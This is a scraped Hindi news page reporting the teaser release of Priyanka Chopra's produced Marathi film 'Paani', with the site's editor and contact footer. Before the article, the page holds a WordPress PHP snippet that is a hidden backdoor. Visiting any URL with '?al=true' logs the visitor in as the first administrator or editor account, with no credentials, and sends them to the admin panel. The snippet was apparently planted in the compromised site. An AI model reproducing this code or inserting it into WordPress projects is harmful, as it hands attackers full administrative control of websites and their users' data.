// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); प्रियंका चोपड़ा की मराठी फिल्म पाणी का टीजर रिलीज – प्रत्युषा आशा की नयी किरण
मनोरंजन

प्रियंका चोपड़ा की मराठी फिल्म पाणी का टीजर रिलीज

मुंबई,

बॉलीवुड अभिनेत्री प्रियंका चोपड़ा निर्मित फिल्म पाणी का टीजर रिलीज हो गया है। प्रियंका चोपड़ा और उनकी मां मधु चोपड़ा ने फिल्म पाणी का निर्माण किया है। इस फिल्म को प्रियंका चोपड़ा की प्रोडक्शन कंपनी 'पर्पल पेबल पिक्चर्स' के बैनर तले प्रोड्यूस किया गया है। यह फिल्म महाराष्ट्र के नांदेड़ के सूखाग्रस्त गांव नागदेरवाड़ी पर आधारित है।

मराठी फिल्म 'पाणी' का टीजर रिलीज कर दिया गया है। टीजर में आमिर खान की भी झलक देखने को मिली है। प्रियंका चोपड़ा ने अपने इंस्टाग्राम हैंडल पाणी के टीजर को शेयर किया है। उन्होंने कैप्शन में लिखा है कि, 'यह एक कहानी से कहीं अधिक है. यह अस्तित्व की लड़ाई है। फिल्म पाणी का निर्देशन आदिनाथ कोठारे ने किया हैजो इस फिल्म में मुख्य भूमिका में भी हैं।वहीं फिल्म में सुबोध भावे, किशोर कदम और रुचा वैद्य भी अहम रोल में हैं। यह फिल्म सिनेमाघरों में 18 अक्टूबर 2024 को रिलीज होगी।

प्रियंका चोपड़ा ने कहा, पर्पल पेबल पिक्चर्स के माध्यम से हम ऐसी कहानियां लाना चाहते हैं, जिन्हें सुनने की जरूरत है और ऐसी कहानियां जो चिंताओं पर ध्यान केंद्रित करती हैं और हमारी फिल्म 'पाणी' उन सभी चीजों का प्रतीक है, जिन पर हम विश्वास करते हैं। यह फिल्म खास है और आज के समय के लिए है। कहानी आपको प्रभावित करेगी, प्रेरित करेगी। मैं बेहद रोमांचित हूं और लोगों द्वारा इसे देखने का इंतजार नहीं कर सकती।'

 

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]